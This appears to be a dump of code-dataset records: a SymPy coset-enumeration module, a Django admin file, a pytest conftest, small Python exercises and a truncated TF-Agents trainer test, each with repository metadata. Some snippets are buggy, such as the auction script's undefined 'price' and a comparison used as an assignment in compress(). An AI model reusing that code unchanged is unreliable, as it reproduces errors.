self.modified_merge(alpha, beta, w, q)
else:
self.merge(alpha, beta, q)
while len(q) > 0:
gamma = q.pop(0)
for x in A_dict:
delta = table[gamma][A_dict[x]]
if delta is not None:
table[delta][A_dict_inv[x]] = None
mu = self.rep(gamma, modified=modified)
nu = self.rep(delta, modified=modified)
if table[mu][A_dict[x]] is not None:
if modified:
v = self.p_p[delta]**-1*self.P[gamma][self.A_dict[x]]**-1
v = v*self.p_p[gamma]*self.P[mu][self.A_dict[x]]
self.modified_merge(nu, table[mu][self.A_dict[x]], v, q)
else:
self.merge(nu, table[mu][A_dict[x]], q)
elif table[nu][A_dict_inv[x]] is not None:
if modified:
v = self.p_p[gamma]**-1*self.P[gamma][self.A_dict[x]]
v = v*self.p_p[delta]*self.P[mu][self.A_dict_inv[x]]
self.modified_merge(mu, table[nu][self.A_dict_inv[x]], v, q)
else:
self.merge(mu, table[nu][A_dict_inv[x]], q)
else:
table[mu][A_dict[x]] = nu
table[nu][A_dict_inv[x]] = mu
if modified:
v = self.p_p[gamma]**-1*self.P[gamma][self.A_dict[x]]*self.p_p[delta]
self.P[mu][self.A_dict[x]] = v
self.P[nu][self.A_dict_inv[x]] = v**-1
# method used in the HLT strategy
def scan_and_fill(self, alpha, word):
"""
A modified version of ``scan`` routine used in the relator-based
method of coset enumeration, described on pg. 162-163 [1], which
follows the idea that whenever the procedure is called and the scan
is incomplete then it makes new definitions to enable the scan to
complete; i.e it fills in the gaps in the scan of the relator or
subgroup generator.
"""
self.scan(alpha, word, fill=True)
def scan_and_fill_c(self, alpha, word):
"""
A modified version of ``scan`` routine, described on Pg. 165 second
para. [1], with modification similar to that of ``scan_anf_fill`` the
only difference being it calls the coincidence procedure used in the
coset-table based method i.e. the routine ``coincidence_c`` is used.
See Also
========
scan, scan_and_fill
"""
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
r = len(word)
f = alpha
i = 0
b = alpha
j = r - 1
# loop until it has filled the alpha row in the table.
while True:
# do the forward scanning
while i <= j and table[f][A_dict[word[i]]] is not None:
f = table[f][A_dict[word[i]]]
i += 1
if i > j:
if f != b:
self.coincidence_c(f, b)
return
# forward scan was incomplete, scan backwards
while j >= i and table[b][A_dict_inv[word[j]]] is not None:
b = table[b][A_dict_inv[word[j]]]
j -= 1
if j < i:
self.coincidence_c(f, b)
elif j == i:
table[f][A_dict[word[i]]] = b
table[b][A_dict_inv[word[i]]] = f
self.deduction_stack.append((f, word[i]))
else:
self.define_c(f, word[i])
# method used in the HLT strategy
def look_ahead(self):
"""
When combined with the HLT method this is known as HLT+Lookahead
method of coset enumeration, described on pg. 164 [1]. Whenever
``define`` aborts due to lack of space available this procedure is
executed. This routine helps in recovering space resulting from
"coincidence" of cosets.
"""
R = self.fp_group.relators
p = self.p
# complete scan all relators under all cosets(obviously live)
# without making new definitions
for beta in self.omega:
for w in R:
self.scan(beta, w)
if p[beta] < beta:
break
# Pg. 166
def process_deductions(self, R_c_x, R_c_x_inv):
"""
Processes the deductions that have been pushed onto ``deduction_stack``,
described on Pg. 166 [1] and is used in coset-table based enumeration.
See Also
========
deduction_stack
"""
p = self.p
table = self.table
while len(self.deduction_stack) > 0:
if len(self.deduction_stack) >= CosetTable.max_stack_size:
self.look_ahead()
del self.deduction_stack[:]
continue
else:
alpha, x = self.deduction_stack.pop()
if p[alpha] == alpha:
for w in R_c_x:
self.scan_c(alpha, w)
if p[alpha] < alpha:
break
beta = table[alpha][self.A_dict[x]]
if beta is not None and p[beta] == beta:
for w in R_c_x_inv:
self.scan_c(beta, w)
if p[beta] < beta:
break
def process_deductions_check(self, R_c_x, R_c_x_inv):
"""
A variation of ``process_deductions``, this calls ``scan_check``
wherever ``process_deductions`` calls ``scan``, described on Pg. [1].
See Also
========
process_deductions
"""
table = self.table
while len(self.deduction_stack) > 0:
alpha, x = self.deduction_stack.pop()
for w in R_c_x:
if not self.scan_check(alpha, w):
return False
beta = table[alpha][self.A_dict[x]]
if beta is not None:
for w in R_c_x_inv:
if not self.scan_check(beta, w):
return False
return True
def switch(self, beta, gamma):
r"""Switch the elements `\beta, \gamma \in \Omega` of ``self``, used
by the ``standardize`` procedure, described on Pg. 167 [1].
See Also
========
standardize
"""
A = self.A
A_dict = self.A_dict
table = self.table
for x in A:
z = table[gamma][A_dict[x]]
table[gamma][A_dict[x]] = table[beta][A_dict[x]]
table[beta][A_dict[x]] = z
for alpha in range(len(self.p)):
if self.p[alpha] == alpha:
if table[alpha][A_dict[x]] == beta:
table[alpha][A_dict[x]] = gamma
elif table[alpha][A_dict[x]] == gamma:
table[alpha][A_dict[x]] = beta
def standardize(self):
r"""
A coset table is standardized if when running through the cosets and
within each coset through the generator images (ignoring generator
inverses), the cosets appear in order of the integers
`0, 1, , \ldots, n`. "Standardize" reorders the elements of `\Omega`
such that, if we scan the coset table first by elements of `\Omega`
and then by elements of A, then the cosets occur in ascending order.
``standardize()`` is used at the end of an enumeration to permute the
cosets so that they occur in some sort of standard order.
Notes
=====
procedure is described on pg. 167-168 [1], it also makes use of the
``switch`` routine to replace by smaller integer value.
Examples
========
>>> from sympy.combinatorics.free_groups import free_group
>>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
>>> F, x, y = free_group("x, y")
# Example 5.3 from [1]
>>> f = FpGroup(F, [x**2*y**2, x**3*y**5])
>>> C = coset_enumeration_r(f, [])
>>> C.compress()
>>> C.table
[[1, 3, 1, 3], [2, 0, 2, 0], [3, 1, 3, 1], [0, 2, 0, 2]]
>>> C.standardize()
>>> C.table
[[1, 2, 1, 2], [3, 0, 3, 0], [0, 3, 0, 3], [2, 1, 2, 1]]
"""
A = self.A
A_dict = self.A_dict
gamma = 1
for alpha, x in product(range(self.n), A):
beta = self.table[alpha][A_dict[x]]
if beta >= gamma:
if beta > gamma:
self.switch(gamma, beta)
gamma += 1
if gamma == self.n:
return
# Compression of a Coset Table
def compress(self):
"""Removes the non-live cosets from the coset table, described on
pg. 167 [1].
"""
gamma = -1
A = self.A
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
chi = tuple([i for i in range(len(self.p)) if self.p[i] != i])
for alpha in self.omega:
gamma += 1
if gamma != alpha:
# replace alpha by gamma in coset table
for x in A:
beta = table[alpha][A_dict[x]]
table[gamma][A_dict[x]] = beta
table[beta][A_dict_inv[x]] == gamma
# all the cosets in the table are live cosets
self.p = list(range(gamma + 1))
# delete the useless columns
del table[len(self.p):]
# re-define values
for row in table:
for j in range(len(self.A)):
row[j] -= bisect_left(chi, row[j])
def conjugates(self, R):
R_c = list(chain.from_iterable((rel.cyclic_conjugates(), \
(rel**-1).cyclic_conjugates()) for rel in R))
R_set = set()
for conjugate in R_c:
R_set = R_set.union(conjugate)
R_c_list = []
for x in self.A:
r = {word for word in R_set if word[0] == x}
R_c_list.append(r)
R_set.difference_update(r)
return R_c_list
def coset_representative(self, coset):
'''
Compute the coset representative of a given coset.
Examples
========
>>> from sympy.combinatorics.free_groups import free_group
>>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
>>> F, x, y = free_group("x, y")
>>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
>>> C = coset_enumeration_r(f, [x])
>>> C.compress()
>>> C.table
[[0, 0, 1, 2], [1, 1, 2, 0], [2, 2, 0, 1]]
>>> C.coset_representative(0)
<identity>
>>> C.coset_representative(1)
y
>>> C.coset_representative(2)
y**-1
'''
for x in self.A:
gamma = self.table[coset][self.A_dict[x]]
if coset == 0:
return self.fp_group.identity
if gamma < coset:
return self.coset_representative(gamma)*x**-1
##############################
# Modified Methods #
##############################
def modified_define(self, alpha, x):
r"""
Define a function p_p from from [1..n] to A* as
an additional component of the modified coset table.
Parameters
==========
\alpha \in \Omega
x \in A*
See Also
========
define
"""
self.define(alpha, x, modified=True)
def modified_scan(self, alpha, w, y, fill=False):
r"""
Parameters
==========
\alpha \in \Omega
w \in A*
y \in (YUY^-1)
fill -- `modified_scan_and_fill` when set to True.
See Also
========
scan
"""
self.scan(alpha, w, y=y, fill=fill, modified=True)
def modified_scan_and_fill(self, alpha, w, y):
self.modified_scan(alpha, w, y, fill=True)
def modified_merge(self, k, lamda, w, q):
r"""
Parameters
==========
'k', 'lamda' -- the two class representatives to be merged.
q -- queue of length l of elements to be deleted from `\Omega` *.
w -- Word in (YUY^-1)
See Also
========
merge
"""
self.merge(k, lamda, q, w=w, modified=True)
def modified_rep(self, k):
r"""
Parameters
==========
`k \in [0 \ldots n-1]`
See Also
========
rep
"""
self.rep(k, modified=True)
def modified_coincidence(self, alpha, beta, w):
r"""
Parameters
==========
A coincident pair `\alpha, \beta \in \Omega, w \in Y \cup Y^{-1}`
See Also
========
coincidence
"""
self.coincidence(alpha, beta, w=w, modified=True)
###############################################################################
# COSET ENUMERATION #
###############################################################################
# relator-based method
def coset_enumeration_r(fp_grp, Y, max_cosets=None, draft=None,
incomplete=False, modified=False):
"""
This is easier of the two implemented methods of coset enumeration.
and is often called the HLT method, after Hazelgrove, Leech, Trotter
The idea is that we make use of ``scan_and_fill`` makes new definitions
whenever the scan is incomplete to enable the scan to complete; this way
we fill in the gaps in the scan of the relator or subgroup generator,
that's why the name relator-based method.
An instance of `CosetTable` for `fp_grp` can be passed as the keyword
argument `draft` in which case the coset enumeration will start with
that instance and attempt to complete it.
When `incomplete` is `True` and the function is unable to complete for
some reason, the partially complete table will be returned.
# TODO: complete the docstring
See Also
========
scan_and_fill,
Examples
========
>>> from sympy.combinatorics.free_groups import free_group
>>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
>>> F, x, y = free_group("x, y")
# Example 5.1 from [1]
>>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
>>> C = coset_enumeration_r(f, [x])
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... print(C.table[i])
[0, 0, 1, 2]
[1, 1, 2, 0]
[2, 2, 0, 1]
>>> C.p
[0, 1, 2, 1, 1]
# Example from exercises Q2 [1]
>>> f = FpGroup(F, [x**2*y**2, y**-1*x*y*x**-3])
>>> C = coset_enumeration_r(f, [])
>>> C.compress(); C.standardize()
>>> C.table
[[1, 2, 3, 4],
[5, 0, 6, 7],
[0, 5, 7, 6],
[7, 6, 5, 0],
[6, 7, 0, 5],
[2, 1, 4, 3],
[3, 4, 2, 1],
[4, 3, 1, 2]]
# Example 5.2
>>> f = FpGroup(F, [x**2, y**3, (x*y)**3])
>>> Y = [x*y]
>>> C = coset_enumeration_r(f, Y)
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... print(C.table[i])
[1, 1, 2, 1]
[0, 0, 0, 2]
[3, 3, 1, 0]
[2, 2, 3, 3]
# Example 5.3
>>> f = FpGroup(F, [x**2*y**2, x**3*y**5])
>>> Y = []
>>> C = coset_enumeration_r(f, Y)
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... print(C.table[i])
[1, 3, 1, 3]
[2, 0, 2, 0]
[3, 1, 3, 1]
[0, 2, 0, 2]
# Example 5.4
>>> F, a, b, c, d, e = free_group("a, b, c, d, e")
>>> f = FpGroup(F, [a*b*c**-1, b*c*d**-1, c*d*e**-1, d*e*a**-1, e*a*b**-1])
>>> Y = [a]
>>> C = coset_enumeration_r(f, Y)
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... print(C.table[i])
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
# example of "compress" method
>>> C.compress()
>>> C.table
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
# Exercises Pg. 161, Q2.
>>> F, x, y = free_group("x, y")
>>> f = FpGroup(F, [x**2*y**2, y**-1*x*y*x**-3])
>>> Y = []
>>> C = coset_enumeration_r(f, Y)
>>> C.compress()
>>> C.standardize()
>>> C.table
[[1, 2, 3, 4],
[5, 0, 6, 7],
[0, 5, 7, 6],
[7, 6, 5, 0],
[6, 7, 0, 5],
[2, 1, 4, 3],
[3, 4, 2, 1],
[4, 3, 1, 2]]
# John J. Cannon; Lucien A. Dimino; George Havas; Jane M. Watson
# Mathematics of Computation, Vol. 27, No. 123. (Jul., 1973), pp. 463-490
# from 1973chwd.pdf
# Table 1. Ex. 1
>>> F, r, s, t = free_group("r, s, t")
>>> E1 = FpGroup(F, [t**-1*r*t*r**-2, r**-1*s*r*s**-2, s**-1*t*s*t**-2])
>>> C = coset_enumeration_r(E1, [r])
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... print(C.table[i])
[0, 0, 0, 0, 0, 0]
Ex. 2
>>> F, a, b = free_group("a, b")
>>> Cox = FpGroup(F, [a**6, b**6, (a*b)**2, (a**2*b**2)**2, (a**3*b**3)**5])
>>> C = coset_enumeration_r(Cox, [a])
>>> index = 0
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... index += 1
>>> index
500
# Ex. 3
>>> F, a, b = free_group("a, b")
>>> B_2_4 = FpGroup(F, [a**4, b**4, (a*b)**4, (a**-1*b)**4, (a**2*b)**4, \
(a*b**2)**4, (a**2*b**2)**4, (a**-1*b*a*b)**4, (a*b**-1*a*b)**4])
>>> C = coset_enumeration_r(B_2_4, [a])
>>> index = 0
>>> for i in range(len(C.p)):
... if C.p[i] == i:
... index += 1
>>> index
1024
References
==========
.. [1] Holt, D., Eick, B., O'Brien, E.
"Handbook of computational group theory"
"""
# 1. Initialize a coset table C for < X|R >
C = CosetTable(fp_grp, Y, max_cosets=max_cosets)
# Define coset table methods.
if modified:
_scan_and_fill = C.modified_scan_and_fill
_define = C.modified_define
else:
_scan_and_fill = C.scan_and_fill
_define = C.define
if draft:
C.table = draft.table[:]
C.p = draft.p[:]
R = fp_grp.relators
A_dict = C.A_dict
p = C.p
for i in range(0, len(Y)):
if modified:
_scan_and_fill(0, Y[i], C._grp.generators[i])
else:
_scan_and_fill(0, Y[i])
alpha = 0
while alpha < C.n:
if p[alpha] == alpha:
try:
for w in R:
if modified:
_scan_and_fill(alpha, w, C._grp.identity)
else:
_scan_and_fill(alpha, w)
# if alpha was eliminated during the scan then break
if p[alpha] < alpha:
break
if p[alpha] == alpha:
for x in A_dict:
if C.table[alpha][A_dict[x]] is None:
_define(alpha, x)
except ValueError as e:
if incomplete:
return C
raise e
alpha += 1
return C
def modified_coset_enumeration_r(fp_grp, Y, max_cosets=None, draft=None,
incomplete=False):
r"""
Introduce a new set of symbols y \in Y that correspond to the
generators of the subgroup. Store the elements of Y as a
word P[\alpha, x] and compute the coset table similar to that of
the regular coset enumeration methods.
Examples
========
>>> from sympy.combinatorics.free_groups import free_group
>>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_r
>>> from sympy.combinatorics.coset_table import modified_coset_enumeration_r
>>> F, x, y = free_group("x, y")
>>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
>>> C = modified_coset_enumeration_r(f, [x])
>>> C.table
[[0, 0, 1, 2], [1, 1, 2, 0], [2, 2, 0, 1], [None, 1, None, None], [1, 3, None, None]]
See Also
========
coset_enumertation_r
References
==========
.. [1] Holt, D., Eick, B., O'Brien, E.,
"Handbook of Computational Group Theory",
Section 5.3.2
"""
return coset_enumeration_r(fp_grp, Y, max_cosets=max_cosets, draft=draft,
incomplete=incomplete, modified=True)
# Pg. 166
# coset-table based method
def coset_enumeration_c(fp_grp, Y, max_cosets=None, draft=None,
incomplete=False):
"""
>>> from sympy.combinatorics.free_groups import free_group
>>> from sympy.combinatorics.fp_groups import FpGroup, coset_enumeration_c
>>> F, x, y = free_group("x, y")
>>> f = FpGroup(F, [x**3, y**3, x**-1*y**-1*x*y])
>>> C = coset_enumeration_c(f, [x])
>>> C.table
[[0, 0, 1, 2], [1, 1, 2, 0], [2, 2, 0, 1]]
"""
# Initialize a coset table C for < X|R >
X = fp_grp.generators
R = fp_grp.relators
C = CosetTable(fp_grp, Y, max_cosets=max_cosets)
if draft:
C.table = draft.table[:]
C.p = draft.p[:]
C.deduction_stack = draft.deduction_stack
for alpha, x in product(range(len(C.table)), X):
if not C.table[alpha][C.A_dict[x]] is None:
C.deduction_stack.append((alpha, x))
A = C.A
# replace all the elements by cyclic reductions
R_cyc_red = [rel.identity_cyclic_reduction() for rel in R]
R_c = list(chain.from_iterable((rel.cyclic_conjugates(), (rel**-1).cyclic_conjugates()) \
for rel in R_cyc_red))
R_set = set()
for conjugate in R_c:
R_set = R_set.union(conjugate)
# a list of subsets of R_c whose words start with "x".
R_c_list = []
for x in C.A:
r = {word for word in R_set if word[0] == x}
R_c_list.append(r)
R_set.difference_update(r)
for w in Y:
C.scan_and_fill_c(0, w)
for x in A:
C.process_deductions(R_c_list[C.A_dict[x]], R_c_list[C.A_dict_inv[x]])
alpha = 0
while alpha < len(C.table):
if C.p[alpha] == alpha:
try:
for x in C.A:
if C.p[alpha] != alpha:
break
if C.table[alpha][C.A_dict[x]] is None:
C.define_c(alpha, x)
C.process_deductions(R_c_list[C.A_dict[x]], R_c_list[C.A_dict_inv[x]])
except ValueError as e:
if incomplete:
return C
raise e
alpha += 1
return C
| [
"kaunalei@gmail.com"
] | kaunalei@gmail.com |
e76c6838f7e87301d6e09a08741750b7f783d361 | 023d045733bb30b2c0cc501908c0dd3de4d2945f | /standssubmission/standsreview/admin.py | 5242b9d5140b17255896969bd652b374065828cd | [] | no_license | pieterdp/fosdem-stand-submission | 3da4a2158935fb54f9a6edeff124050efed3738e | 3bd6355e53014160fbdd15970f142c24adb040cd | refs/heads/master | 2023-01-28T04:38:50.037785 | 2020-12-06T19:58:13 | 2020-12-06T19:58:13 | 307,077,984 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | from django.contrib import admin
from .models import Review, Decision
# Register your models here.
admin.site.register(Review)
admin.site.register(Decision)
| [
"pieter.de.praetere@helptux.be"
] | pieter.de.praetere@helptux.be |
f415d23be4af1035d4cbc400cd5f475a7c165207 | 9bd29c69d1d65954e6594a8b371a9aa67f010a81 | /conftest.py | 9c6f052141d35eddc85238884bea5afdcb35ed99 | [] | no_license | jhunkeler/asdf | 0bb11701b64075d714add13061e85fc1ccbaa8aa | 1b41c6d04f657940c3fc02443dd3bdfd78619ba8 | refs/heads/master | 2022-03-06T04:31:18.237751 | 2019-10-22T16:22:00 | 2019-10-22T16:22:00 | 109,301,360 | 0 | 0 | null | 2017-11-02T18:07:26 | 2017-11-02T18:07:26 | null | UTF-8 | Python | false | false | 798 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
import os
import pytest
from _pytest.doctest import DoctestItem
@pytest.fixture(autouse=True)
def _docdir(request):
"""
Make sure that doctests run in a temporary directory so that any files that
are created as part of the test get removed automatically.
"""
# Trigger ONLY for the doctests.
if isinstance(request.node, DoctestItem):
# Get the fixture dynamically by its name.
tmpdir = request.getfixturevalue('tmpdir')
# Chdir only for the duration of the test.
olddir = os.getcwd()
tmpdir.chdir()
yield
os.chdir(olddir)
else:
# For normal tests, we have to yield, since this is a yield-fixture.
yield
| [
"ddavella@stsci.edu"
] | ddavella@stsci.edu |
4f8fa08437a586f911ad3dfd31be2c934da9fe01 | a6dff3b91e0b335621c682d68605ccb91478abf7 | /day9.py | 229f88cad4549125dc28e3c4a466266a9bb3effd | [] | no_license | prasansabhagat/python | b088e7d67ab388cbee5acbf987d1ee780204123b | 323c5e5f0544042fb175faad8be99969301575c3 | refs/heads/main | 2023-07-13T02:28:13.993340 | 2021-08-15T16:45:41 | 2021-08-15T16:45:41 | 393,764,787 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | #ctrl + ] -- for indentation
bid_dictionary = {}
bidding_finished = False
while not bidding_finished:
name = input("What is your name? ")
bid = input("How much amount do you want to bid? Rs")
bid_dictionary[name] = price
question = input("Is there other person who wants to bid? yes or no ")
if question == "no":
bidding_finished = True
elif question == "yes":
print("Welcome to the secret auction program `~'")
| [
"75807786+prasansabhagat@users.noreply.github.com"
] | 75807786+prasansabhagat@users.noreply.github.com |
95ae8d1b15002d3d3c3c64d60796b3909dd9c81b | cc6d94c5f0c066abdfa68c70766ed67901d2a60a | /.ipynb_checkpoints/app-checkpoint.py | b8c70774cfd1e1566a3961176091da8907a1b77f | [] | no_license | ThinhNg/MissionToMarsScrape | 82d85318bb9c82a6cd9190b946e5ae763647fd3a | ba5ff4fcc933d91f250458da5d114f97d4cba2d8 | refs/heads/master | 2020-04-23T08:59:59.660423 | 2020-03-28T03:42:47 | 2020-03-28T03:42:47 | 171,054,972 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import mission_to_mars.py
# Create an instance of Flask
app = Flask(__name__)
# Use PyMongo to establish Mongo connection
mongo = PyMongo(app, uri="mongodb://localhost:27017/Mars_Data")
# Route to render index.html template using data from Mongo
@app.route("/")
def home():
# Find one record of data from the mongo database
MartianData = mongo.db.collection.find_one()
# Return template and data
return render_template("index.html", Martian=MartianData)
# Route that will trigger the scrape function
@app.route("/scrape")
def scrape():
# Run the scrape function
MartianData = mission_to_mars.scrape()
# Update the Mongo database using update and upsert=True
mongo.db.collection.update({}, MartianData, upsert=True)
# Redirect back to home page
return redirect("/")
if __name__ == "__main__":
app.run(debug=True)
| [
"thinhnguyenns@gmail.com"
] | thinhnguyenns@gmail.com |
aa893b07c3613f505969019869fe7e5913d60a10 | 8634b4f7f2293bf431ba8ed59e95f80abc59483f | /Homework/10/orderdict.py | fae771bb2e90cba4047e19dc516c8e03b0f7b948 | [] | no_license | TitanVA/Metiz | e1e2dca42118f660356254c39c7fadc47f772719 | e54f10b98226e102a5bb1eeda7f1e1eb30587c32 | refs/heads/master | 2020-12-22T11:44:58.746055 | 2020-02-10T14:41:16 | 2020-02-10T14:41:16 | 236,770,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | from _collections import OrderedDict
favorite_languages = OrderedDict()
favorite_languages['jen'] = 'python'
favorite_languages['sarah'] = 'c'
favorite_languages['edward'] = 'ruby'
favorite_languages['phil'] = 'python'
for name, language in favorite_languages.items():
print(name.title() + '\'s favorite language is',
language.title() + '.')
| [
"viktorbezai@gmail.com"
] | viktorbezai@gmail.com |
8d953f282b7786cb90d112bd8b7f8fd2757af599 | b064696e34a31d2f23eb5da4f364a09542428b44 | /tf_agents/bandits/agents/examples/v2/trainer_test.py | d9117e9018d28a7092aa409817daa2ffa23575b0 | [
"Apache-2.0"
] | permissive | vraoresearch/agents | affead659efd3b5ac232d3d9ff60a1fabe74250e | 58ffe1eec6e38a2cddcf34834d795b37e3b8843b | refs/heads/master | 2022-11-19T10:01:54.906271 | 2022-10-27T14:41:56 | 2022-10-27T14:42:23 | 293,401,771 | 0 | 1 | Apache-2.0 | 2020-09-07T02:23:54 | 2020-09-07T02:23:53 | null | UTF-8 | Python | false | false | 11,646 | py | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tf_agents.bandits.agents.examples.v2.trainer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import tempfile
from unittest import mock
from absl import logging
from absl.testing import parameterized
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
import tensorflow_probability as tfp
from tf_agents.bandits.agents import exp3_agent
from tf_agents.bandits.agents.examples.v2 import trainer
from tf_agents.bandits.agents.examples.v2 import trainer_test_utils
from tf_agents.bandits.environments import environment_utilities
from tf_agents.bandits.environments import random_bandit_environment
from tf_agents.bandits.environments import stationary_stochastic_py_environment
from tf_agents.bandits.environments import wheel_py_environment
from tf_agents.bandits.metrics import tf_metrics as tf_bandit_metrics
from tf_agents.environments import tf_py_environment
from tf_agents.metrics import export_utils
from tf_agents.specs import tensor_spec
tfd = tfp.distributions
tf.compat.v1.enable_v2_behavior()
def get_bounded_reward_random_environment(
observation_shape, action_shape, batch_size, num_actions):
"""Returns a RandomBanditEnvironment with U(0, 1) observation and reward."""
overall_shape = [batch_size] + observation_shape
observation_distribution = tfd.Independent(
tfd.Uniform(low=tf.zeros(overall_shape), high=tf.ones(overall_shape)))
reward_distribution = tfd.Uniform(
low=tf.zeros(batch_size), high=tf.ones(batch_size))
action_spec = tensor_spec.BoundedTensorSpec(
shape=action_shape, dtype=tf.int32, minimum=0, maximum=num_actions - 1)
return random_bandit_environment.RandomBanditEnvironment(
observation_distribution, reward_distribution, action_spec)
def get_environment_and_optimal_functions_by_name(environment_name, batch_size):
if environment_name == 'stationary_stochastic':
context_dim = 7
num_actions = 5
action_reward_fns = (
environment_utilities.sliding_linear_reward_fn_generator(
context_dim, num_actions, 0.1))
py_env = (
stationary_stochastic_py_environment
.StationaryStochasticPyEnvironment(
functools.partial(
environment_utilities.context_sampling_fn,
batch_size=batch_size,
context_dim=context_dim),
action_reward_fns,
batch_size=batch_size))
optimal_reward_fn = functools.partial(
environment_utilities.tf_compute_optimal_reward,
per_action_reward_fns=action_reward_fns)
optimal_action_fn = functools.partial(
environment_utilities.tf_compute_optimal_action,
per_action_reward_fns=action_reward_fns)
environment = tf_py_environment.TFPyEnvironment(py_env)
elif environment_name == 'wheel':
delta = 0.5
mu_base = [0.05, 0.01, 0.011, 0.009, 0.012]
std_base = [0.001] * 5
mu_high = 0.5
std_high = 0.001
py_env = wheel_py_environment.WheelPyEnvironment(delta, mu_base, std_base,
mu_high, std_high,
batch_size)
environment = tf_py_environment.TFPyEnvironment(py_env)
optimal_reward_fn = functools.partial(
environment_utilities.tf_wheel_bandit_compute_optimal_reward,
delta=delta,
mu_inside=mu_base[0],
mu_high=mu_high)
optimal_action_fn = functools.partial(
environment_utilities.tf_wheel_bandit_compute_optimal_action,
delta=delta)
return (environment, optimal_reward_fn, optimal_action_fn)
class MockLog(mock.Mock):
def __init__(self, *args, **kwargs):
super(MockLog, self).__init__(*args, **kwargs)
self.lines = []
def info(self, message, *args):
self.lines.append(message % args)
logging.info(message, *args)
def as_string(self):
return '\n'.join(self.lines)
class TrainerTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
dict(testcase_name='_0',
num_actions=11,
observation_shape=[8],
action_shape=[],
batch_size=32,
training_loops=10,
steps_per_loop=10,
learning_rate=.1),
dict(testcase_name='_1',
num_actions=73,
observation_shape=[5, 4, 3, 2],
action_shape=[],
batch_size=121,
training_loops=7,
steps_per_loop=8,
learning_rate=.5),
)
def testTrainerExportsCheckpoints(self,
num_actions,
observation_shape,
action_shape,
batch_size,
training_loops,
steps_per_loop,
learning_rate):
"""Exercises trainer code, checks that expected checkpoints are exported."""
root_dir = tempfile.mkdtemp(dir=os.getenv('TEST_TMPDIR'))
environment = get_bounded_reward_random_environment(
observation_shape, action_shape, batch_size, num_actions)
agent = exp3_agent.Exp3Agent(
learning_rate=learning_rate,
time_step_spec=environment.time_step_spec(),
action_spec=environment.action_spec())
for i in range(1, 4):
trainer.train(
root_dir=root_dir,
agent=agent,
environment=environment,
training_loops=training_loops,
steps_per_loop=steps_per_loop)
latest_checkpoint = tf.train.latest_checkpoint(root_dir)
expected_checkpoint_regex = '.*-{}'.format(i * training_loops)
self.assertRegex(latest_checkpoint, expected_checkpoint_regex)
@parameterized.named_parameters(
dict(testcase_name='_stat_stoch__linucb',
environment_name='stationary_stochastic',
agent_name='LinUCB'),
dict(testcase_name='_stat_stoch__lints',
environment_name='stationary_stochastic',
agent_name='LinTS'),
dict(testcase_name='_stat_stoch__epsgreedy',
environment_name='stationary_stochastic',
agent_name='epsGreedy'),
dict(testcase_name='_wheel__linucb',
environment_name='wheel',
agent_name='LinUCB'),
dict(testcase_name='_wheel__lints',
environment_name='wheel',
agent_name='LinTS'),
dict(testcase_name='_wheel__epsgreedy',
environment_name='wheel',
agent_name='epsGreedy'),
dict(testcase_name='_wheel__mix',
environment_name='wheel',
agent_name='mix'),
)
def testAgentAndEnvironmentRuns(self, environment_name, agent_name):
batch_size = 8
training_loops = 3
steps_per_loop = 2
(environment, optimal_reward_fn, optimal_action_fn
) = trainer_test_utils.get_environment_and_optimal_functions_by_name(
environment_name, batch_size)
agent = trainer_test_utils.get_agent_by_name(agent_name,
environment.time_step_spec(),
environment.action_spec())
regret_metric = tf_bandit_metrics.RegretMetric(optimal_reward_fn)
suboptimal_arms_metric = tf_bandit_metrics.SuboptimalArmsMetric(
optimal_action_fn)
with mock.patch.object(
export_utils, 'logging', new_callable=MockLog) as mock_logging:
trainer.train(
root_dir=tempfile.mkdtemp(dir=os.getenv('TEST_TMPDIR')),
agent=agent,
environment=environment,
training_loops=training_loops,
steps_per_loop=steps_per_loop,
additional_metrics=[regret_metric, suboptimal_arms_metric])
logged = mock_logging.as_string()
self.assertEqual(logged.count('RegretMetric'), training_loops)
self.assertEqual(logged.count('SuboptimalArmsMetric'), training_loops)
self.assertEqual(logged.count('loss'), training_loops)
def testResumeTrainLoops(self):
batch_size = 8
training_loops = 3
steps_per_loop = 2
environment_name = 'stationary_stochastic'
agent_name = 'epsGreedy'
environment, _, _ = (
trainer_test_utils.get_environment_and_optimal_functions_by_name(
environment_name, batch_size))
agent = trainer_test_utils.get_agent_by_name(agent_name,
environment.time_step_spec(),
environment.action_spec())
root_dir = tempfile.mkdtemp(dir=os.getenv('TEST_TMPDIR'))
def train(training_loops, resume_training_loops):
trainer.train(
root_dir=root_dir,
agent=agent,
environment=environment,
training_loops=training_loops,
steps_per_loop=steps_per_loop,
resume_training_loops=resume_training_loops)
with mock.patch.object(
